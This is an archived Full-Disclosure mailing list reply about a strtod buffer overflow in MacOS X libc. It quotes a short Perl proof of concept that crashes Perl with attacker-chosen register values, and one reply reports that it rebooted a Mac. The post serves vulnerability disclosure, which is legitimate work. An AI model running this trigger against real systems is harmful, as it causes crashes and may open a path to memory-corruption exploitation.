full-disclosure-uk January 2010 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] MacOS X 10.5/10.6 libc

Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow

From: Maksymilian Arciemowicz <cxib_at_nospam>
Date: Mon Jan 11 2010 - 19:46:21 GMT
To: Joshua Levitsky <jlevitsk@joshie.com>


I have not checked this issue in macos 10.4. In MacOS 10.1 does not work. But the perl script (in macos 10.5)

Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f, 0x0.0x41414141;
Chujwamwmuzg.pl ---

will crash with
esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure

http://securityreason.com/achievement_securityalert/60 http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.

> Joshua Levitsky wrote:
> and it then rebooted my mac :)
>
> On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevitsk@joshie.com
> <mailto:jlevitsk@joshie.com>> wrote:
>
> The below hosed my terminal session on 10.4.11... I did this in a
> >console login so don't have the results.. You need? or is dropping
> me to a blue screen and lack of system response good?
>
> #!/usr/local/bin/perl
> printf "%0.4194310f", 0x0.0x41414141;
>
>
> Perl will crash with
> esi = 0x41414141
> edi = 0x15
>
> -Josh
-- Best Regards, ------------------------ pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) <cxib@securityreason.com> sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/